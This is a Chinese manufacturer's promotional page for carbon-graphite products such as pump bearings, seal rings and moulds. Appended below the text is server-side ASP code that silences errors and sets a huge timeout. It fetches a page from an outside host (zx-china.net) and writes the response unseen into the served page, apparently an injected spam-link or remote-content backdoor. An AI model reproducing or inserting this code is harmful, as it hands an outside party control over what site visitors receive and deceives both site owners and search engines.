碳素石墨制品具有优良的耐腐蚀、耐高温、无油自润滑、膨胀系数低等特点。因此,在机电、化工、冶金、石油、轻纺、玻璃等机械设备中有着广泛的应用。我们公司主导产品有:潜水电泵用合金、石墨轴承、合金、石墨止推轴承;屏蔽电泵用石墨轴承;旋转接头用石墨浸锑、石墨密封环;化工泵用石墨机械密封环;染整设备用石墨环、石墨条;真空泵用石墨旋片;纺织设备用方型条布辊轴承;金刚石用石墨烧结模具;渭触线用C412渭触片;冶炼用结晶器套管;玻璃制品用石墨模具;电火花用石墨材料;各种异形石墨制品等。
我们公司以用户服务为宗旨,市场要求为目标,本着想客户所想,急客户所急的企业理念,竭诚欢迎各地新老客户选购碳素制件产品,公司广大员工以热诚优质的服务恭候各地的新老客户光临!
<%
On Error Resume Next
Server.ScriptTimeOut=9999999
response.write(getHTTPPage("http://www.zx-china.net/link.html"))
function getHTTPPage(url)
dim http
set http=createobject("MSXML2.XMLHTTP")
Http.open "GET",url,false
Http.send()
if Http.readystate<>4 then
exit function
end if
getHTTPPage=bytes2BSTR(Http.responseBody)
set http=nothing
if err.number<>0 then err.Clear
end function
Function bytes2BSTR(vIn)
dim strReturn
dim i,ThisCharCode,NextCharCode
strReturn = ""
For i = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn,i,1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn,i+1,1))
strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
i = i + 1
End If
Next
bytes2BSTR = strReturn
End Function
%>
|